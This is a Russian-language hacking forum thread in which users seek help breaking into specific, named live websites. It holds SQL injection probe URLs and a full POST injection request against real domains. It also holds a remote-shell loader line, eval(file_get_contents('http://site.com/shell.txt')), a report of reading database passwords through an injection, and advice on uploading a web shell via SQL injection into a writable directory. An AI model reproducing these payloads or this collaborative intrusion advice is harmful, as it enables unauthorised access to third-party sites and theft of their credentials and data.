Melfis, ничего не получится, скобки тоже фильтруются http://mag.su/forum/login.php?sid=351f4eb4d8dbe4ea209f81a4e4bac4ff&username='0()'0&password=1
Подскажите пожалуйста, а с этим можно чего-нить сделать? Это вообще уязвимость или нет? - http://mag.su/maglove/viewprofiles.php?sid=1&next=1'
При попытке залить шелл через eval(file_get_contents('http://site.com/shell.txt')); (vBulletin 4) вылетает вот какая ошибка: http://pikucha.ru/i5NOd
Использовать поиск по форуму: http://forum.antichat.ru/showthread.php?t=191917 И внимательно читать не только первый пост.
Помогите раскрутить SQL inj Уязвимая страница Code: http://www.allyachts.ru/YachtsSearch.asp?ret=2 POST запросом отсылаем Code: actSearche=1&selectsearche=0&intsearche=2&strsearche=%26verf%3D%26Kind%3D%26intsearcheto1%3D85%26intsearchefrom1%3D2%2C35%26intsearcheto2%3D30%26intsearchefrom2%3D0%27&ID_Employees=&ID_Purpose=&ID_KindOfYachts=&ID_SeaWorthiness=&ID_MaterialBody=&ID_Engine=&ID_IntSearche1=1&intsearchefrom1=2%2C35&ifmin1=2%2C35&intsearcheto1=85&ifmax1=85&ID_IntSearche2=[COLOR=DarkRed]INJECTION[/COLOR]&intsearchefrom2=0&ifmin2=0&intsearcheto2=30&ifmax2=30 тип БД - MSSQL Описание проблемы
Всем привет. Нашёл скулю на одном сайтике, через её посмотрел конфиг с паролями от БД, но муадмин не нашёл. Пробовал через шелл законектится с другого хоста, безрезультатно. Что можно сделать? очень нужен там шелл.
если через скуль прочитал файл то через нее же попробуй залить шелл, для этого тебе надо знать относительный путь сайта и найти директорию разрешенную для заливки файлов
Можно как нить раскрутить вот это - http://ugroza.net:80/index.php?do=search&subaction=search&search_start=0&full_search=0&result_from=1&result_num=20&story=admin&dosearch=admin&titleonly=0&searchuser=\'&exactname=yes&replyless=0&replylimit=0&searchdate=0&beforeafter=after&sortby=date&resorder=desc&showposts=0&catlist[]=0&doclear=admin Заранее спасибо
нет, ковычки либо слешируются, либо вырезаются(и не только кавычки). Все параметры, вставляющие в запрос к базе, обрамлены кавычками.